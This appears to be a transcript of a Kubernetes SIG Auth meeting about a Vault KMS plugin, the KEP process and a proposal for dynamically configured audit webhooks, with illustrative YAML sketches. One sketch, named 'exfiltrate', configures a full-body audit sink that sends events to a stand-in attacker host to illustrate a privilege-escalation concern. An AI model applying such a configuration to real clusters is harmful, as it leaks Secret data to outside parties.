From YouTube: Kubernetes SIG Auth 20180725
Description
Kubernetes Auth Special-Interest-Group (SIG) Meeting 20180725
Meeting Notes/Agenda: https://docs.google.com/document/d/1woLGRoONE3EBVx-wTb4pvp4CI7tmLZ6lS26VTbosLKM/view#
Find out more about SIG Auth here: https://github.com/kubernetes/community/tree/master/sig-auth
B: Sure, a very, very short piece. We are talking to the HashiCorp guys right after this meeting; we're going over what we've gotten working with Vault as a provider for the KMS plugin. Once we complete the discussion, I expect to get that repo out this week. I'll update this and issue number 460 with the link to the repo once it's live. That's about it.
A: Cool. Is that a KEP, or was that just a regular design proposal? I remember seeing it talked about.
A: What is the date for feature freeze?

It is next Tuesday.
D: Do you know what the requirements are for proposals and KEPs around feature freeze? Do they need to be merged? Do they need to be marked implementable?
C: It's a field on the KEP, so that's kind of the last bit for people to say: yep, this API makes sense; this is a good step that we can go off and implement. Okay.
D: And just to clarify a point on that: it being implementable obviously doesn't mean that the design is finished. We can still add pieces and features layered on top. It's just that the proposal, as is, is kind of the minimum piece that we could implement as a standalone thing.

Gotcha. Okay, so specifically in the context of something like dynamic policy, that's something that could, I think, definitely be layered on at a later date.
C: Yeah, one of the questions I have around the KEP process, actually, is: once you have a minimum viable design and an agreed-on first step, and it flips to implementable, how do additions from that point on work? Do the changes to the design get opened as PRs and then just sit there and not get merged until the change or addition is totally complete? Because otherwise you're merging things into a doc that says it can be implemented.
A: Right, that strategy has worked well for me in the past; I employed it with the TokenRequest work, where I removed a bunch of the functionality from the original design proposal, which allowed it to merge faster. So that might be something to consider with the dynamic audit KEP.
D: Yeah, so I mean it's a pretty small addition to what we already merged. Obviously it's kind of a big change there, so there definitely needs to be discussion around whether we're comfortable with that idea. The current setup is that you would have an audit configuration object, and right now we just have the webhook in there. This would just add the policy to that object. So, basically, you can have multiple instances of this object.
D: Living kind of independently: whatever policy is within that object would just log out to that webhook, if that makes sense.
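The shape being discussed, multiple independently living configuration objects, each pairing one webhook backend with its own policy, might look roughly like the sketch below. The group, kind, and field names here are illustrative only, not a merged API:

```yaml
# Hypothetical dynamic audit configuration object.
# Each instance pairs one webhook backend with the policy
# that scopes which events get delivered to it.
apiVersion: auditregistration.k8s.io/v1alpha1
kind: AuditSink
metadata:
  name: third-party-auditor
spec:
  policy:
    # Only metadata-level events for this sink.
    level: Metadata
    stages:
      - ResponseComplete
  webhook:
    clientConfig:
      # Endpoint of the external auditing service.
      url: https://audit.example.com/events
```

A cluster could hold several such objects, each delivering a differently scoped event stream to a different service.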
C: Yeah, I think conceptually it's simple. It takes the implementation from a one-policy to a many-policy implementation, though; I don't know if we want to phase the implementation, doing the dynamic backends first and then tackling the multi-policy aspects. Where were you wanting to get?
D: Well, I guess there's this trade-off between implementing the policy on the client side (the client in this case being the API server, since it's pushing) or on the server side, which is the receiver of the audit events.
D: It kind of skirts around the issue of dealing with aggregated API servers.
D: On the other hand, it means that every webhook needs to go and re-implement the policy logic, and you're getting more traffic over the wire.

Yeah. The other piece that kind of attracts us, I guess, given what we're trying to do: say you want to send out just a specific set of events to some sort of third-party auditing service, and you don't want to expose all of your stuff to them. You just want to send out a specific set of events that's well scoped to that service; otherwise you'd have to rely on them. There'd have to be, I guess, a trust there that could be pretty finicky.

Yeah, that makes sense. It's a good point. You could bounce the events through an intermediate service that does the filtering, but again you're paying the cost of those extra events plus the added complexity of building that service out.
D: You could proxy it, yeah. I mean, it's definitely an option. I guess it is kind of still the same boat. I don't know, it's tricky. I can definitely see there's complexity either way you go with it; it's something you don't want, I guess.
D: So, I mean, definitely for this iteration I just saw it as privileged cluster operators. I knew there was kind of a desire to have namespace-level configuration; that got just incredibly complex when we tried to do it, and I don't want to try to tackle it at the moment. I can definitely see the use of it, but the complexity level becomes really high in the API server trying to make sense of that.
D: So this iteration is just looking at: you have a highly privileged, cluster-admin-level user, and they're dynamically configuring auditing services external to Kubernetes.
A: I would be interested in an analysis of how this impacts the SLO of audit. Have we discussed what our SLO for the audit webhook is? For example, what does it mean to drop audit events?
D: Which means that they can't get to the same SLO as the statically configured webhook.
C: If delivery of the audit log event fails, we will not block the request as a result.
D: Yeah, one of the reasons for that is: if you allow it to be blocking and you misconfigure your webhook, you've essentially hosed the cluster, without some mechanism to kind of unstick it.
D: I think we maybe should still consider it as an option, just because, if you were to document it well so that people understand that by configuring this webhook you could potentially lock yourself out, I could see facilities that would potentially require that, I don't know, there's nothing at risk involved. I mean, there is precedent with admission control, with dynamic admission control, doing that.
C: Yeah, although dynamic admission takes steps there: it excludes itself from being governed by dynamic admission, and it gives you options in the object itself to let you exclude, say, the namespace containing your dynamically hosted admission plugin.
D: That's interesting, okay.
C: I know for the rule evaluation, when you're going through the API pipeline and deciding whether to put particular information into the audit event on the request context: right now, the thing that is responsible for delivering these events to the webhooks is going to have to evaluate all the rules on all the policies to see if any of them require a particular level of verbosity, and then, when it is delivering those events, it's either going to have to re-evaluate those rules or it's going to have to track more information about which levels of verbosity applied to which webhooks.
C: So we would definitely want to benchmark with multiple policies with multiple rules: how that impacts evaluation, and space, as far as what we're having to track on the request context. That's why I was asking about phasing the implementation, just because the single-policy implementation seems way simpler to reason about, and much closer to the stuff we've already benchmarked.
D: Sure, yeah. One of the simplifications we made in the initial proposal was that the dynamic webhooks would always receive metadata-level events, if I'm remembering correctly.
D: So if we stick with that simplification, then I'm less worried about the problem that Jordan just mentioned.

Wait, were you saying that it would only ever log at the metadata level? Yeah, that would be tricky, at least for our goals; we're definitely looking for request-response level there.
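For context, the levels being contrasted are the ones from the static audit policy file. A minimal policy sketch showing the difference between the metadata-only simplification and the request-response level wanted here (the resource choices are illustrative):

```yaml
apiVersion: audit.k8s.io/v1beta1
kind: Policy
rules:
  # Metadata: logs request metadata (user, verb, resource,
  # timestamp) but neither request nor response bodies.
  - level: Metadata
    resources:
      - group: ""
        resources: ["secrets"]
  # RequestResponse: logs metadata plus the full request and
  # response bodies; this is the level the dynamic-backend
  # use case is asking for.
  - level: RequestResponse
    resources:
      - group: "apps"
        resources: ["deployments"]
```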
A: Before that, I had a question on this, Jordan: do you think this is more complex or less complex than the reverse indexing that is implemented to support watches in the API server?
C: For watch we have a lot more dimensions, right? And watches are always scoped to a single resource type, so you also have lower cardinality there. So, for both of those reasons, this seems more complex. Also, you have multiple levels of delivery. When you're delivering a watch event, the decision is just thumbs up or thumbs down, does this go to this watcher, whereas with audit it's both does this go to this watcher and with what degree of information, so you're not just delivering the same content to all watchers. I guess, to Tim's point, one of the simplifying assumptions was...
D: That piece originally... I could have misread it, sorry. Yeah, so it's the pull-based audit events that carry the metadata-only assumption. But that does raise an interesting point, then, for this proposal: how would it deal with aggregated API servers? Right now the assumption is that the API servers that deal with different types have different policies, so that they're doing whatever they need to do to handle the types that they know about.
C: Yeah, I would actually kind of expect this to work like dynamic webhook admission, where you're defining the types that are going to come to your admission webhook with one policy object, and then all the API servers that run the webhook admission plugin drive themselves via that policy, whether that's the kube-apiserver for kube API types or some other extension API server.
C: Similarly, each API server that enables this audit mechanism could feed off the same policy. So the kube-apiserver would look at an audit policy that says "I want to know about all types" and would send request-response audit events for kube API types, and the extension API server would look at that same policy and say, well, I'm going to send request-response audit events for my API types.
F: That's what I would expect too: if you build it as an extension API server, you read a policy and just ignore types that you don't have.
C: That could actually be an optimization, right? So if in your policy you say, I want to know about these types in the extensions group, and these types in the apps group, and these types in the acme.com group, well, the kube-apiserver can discard the groups that it doesn't serve, at least for the request-response phases; it doesn't have to continuously evaluate them.
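A sketch of the kind of multi-group policy being described; each API server could prune the rules for groups it does not serve before doing per-request evaluation (group and resource names here are illustrative):

```yaml
apiVersion: audit.k8s.io/v1beta1
kind: Policy
rules:
  # Groups served by the kube-apiserver: it keeps these rules.
  - level: RequestResponse
    resources:
      - group: "apps"
        resources: ["deployments"]
      - group: "extensions"
        resources: ["ingresses"]
  # Served only by an aggregated API server for acme.com:
  # the kube-apiserver can discard this rule up front, while
  # the acme.com extension server evaluates only this one.
  - level: RequestResponse
    resources:
      - group: "acme.com"
        resources: ["widgets"]
```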
D: Yeah, that makes sense. Right now, I think, to set up audit in the common case, we just set up audit on the main aggregator API server and just log metadata level for the others.
D: So one option is: if an API server gets a request for a type that it doesn't know about, it just maxes out at metadata level, even if the policy specifies request level.
C: So, Patrick, it sounds like there's not necessarily disagreement about letting the policy be per-webhook, or different per webhook. But if we're looking at something like an actual deliverable for the 1.12 time frame, getting both of those implemented seems aggressive to me. I'm not sure what Tim would think.
C: My guess would be it would mostly be impact on API Machinery, making sure the pieces that need to be dynamically evaluable are plumbed correctly, and then involvement from Scalability, to make sure that, given the testing we've already done, we know how this impacts things and whether the impact is acceptable or not.
C: So, just to get something usable earlier, I'd like to see the first phase go in and then queue up the dynamic policy bit, but I don't know what other people think.
D: I think we're probably good on that. We can definitely focus on just that first piece; I think that is a good-sized chunk. Get that in there, get it benchmarked, and then get with SIG API Machinery and Scalability and talk to them about the policy piece, and just track that as we go. If things go super quick, maybe squeeze it in there; otherwise, just drag it down the line.
D: Yeah, I think I agree with that. Just keep in mind the eventual goal of adding the policy when you're factoring the code and whatnot.

Yep. All right, a couple of questions real quick.
D: If, say, I configure a webhook dynamically and there's no policy statically configured through a flag, then nothing would happen, right?
C: Is that what happens today? I guess, is it even possible to configure that via flags? I guess you would enable this audit backend explicitly on the command line; it would probably be an error, currently, to say you want this and not specify a policy file.
C: I think if you say you want this and you don't specify a policy file, we probably should not start. That seems like a mistake rather than something useful to let them do.
D: Agreed, I would expect this to work the same way, okay, at least until we have... thank you.
D: One more question I want to raise on the dynamic policy: if we allow the policy to raise the audit level above the static policy, then we get into this kind of funny situation where you can set up an audit webhook that exports secret data, for instance. Is that something we're okay with from a security perspective? Because it basically means that the ability to configure an audit webhook gives you read access to all resources in the cluster.
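To make the concern concrete: if a dynamic configuration object could carry a policy that raises the level, whoever can create one effectively reads every Secret written through the API. A sketch, with hypothetical group, kind, and field names:

```yaml
# Hypothetical dynamic configuration escalating the audit level.
apiVersion: auditregistration.k8s.io/v1alpha1
kind: AuditSink
metadata:
  name: exfiltrate
spec:
  policy:
    # RequestResponse would ship full request/response bodies,
    # including Secret contents, to the webhook below.
    level: RequestResponse
  webhook:
    clientConfig:
      url: https://attacker.example.com/
```

This is why creating such objects would need to be treated as a highly privileged, cluster-admin-level operation.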
D: The options being to either just document that well, or provide some sort of override so that you can't ever go above the statically configured policy. We initially explored that and ran into some issues, just some strange edge cases around trying to do it.
F: I think the other kind of confusing thing that came up in discussion before was that you can't really say whether one audit policy is more or less restrictive than another, because there are multiple dimensions by which you can restrict them. It might be that you want to restrict which namespaces can be logged, or you might want to restrict which level things can be logged at; it's sort of not intuitive how one restriction compares to another.
C: If we want a way to limit it, the all-or-nothing today is: do you even enable this dynamic mechanism? Once there's the ability to specify per-dynamic-webhook policy, just letting the person running the cluster decide whether they want to allow that or not seems fine, because they're the ones who know what...
C: Sure, I mean, yeah, we can't support both use cases at the same time. So I think we don't want degrees of freedom that don't serve specific use cases, and we want to make sure that the reasonable use cases that we can handle are handled in a pretty straightforward way. Laying those out and saying what knobs you would have to turn and what you would have to do to accomplish this: that's a good thing to do when you're building a feature like this.
D: I had another question. I brought this up in SIG API Machinery, but obviously we need an informer around the configuration object. I was originally mapping towards dynamic admission, but apparently that was an exception, and the informers and clients should not be in client-go for something like this; they should actually be within the API server itself. The API server doesn't seem to have any informers generated today. Is that something I should just add in there?
A: Does that cover what you wanted to discuss about the audit policy KEP?
D: Yeah, I think that gives us clear direction going forward. I appreciate everybody jumping in, and we'll start on the basic stuff and see how everything goes with that.
C: Yeah, and make sure that it is on the board for API review. One of the things we're trying to do regarding API review is let SIGs decide what projects have value and what directions they want to go, and then, once there are KEPs describing why this is an important thing to do that have approval from the SIG, it gets queued up to make sure the API makes sense. We're trying to do a little better job of pipelining these things and getting visibility early.
C: So, now that the first stage of this has kind of gotten agreement, yeah, I would open a PR to flip it to implementable, and I will send you a link to the...
D: So yeah, I need to add an issue as well, I guess, over there.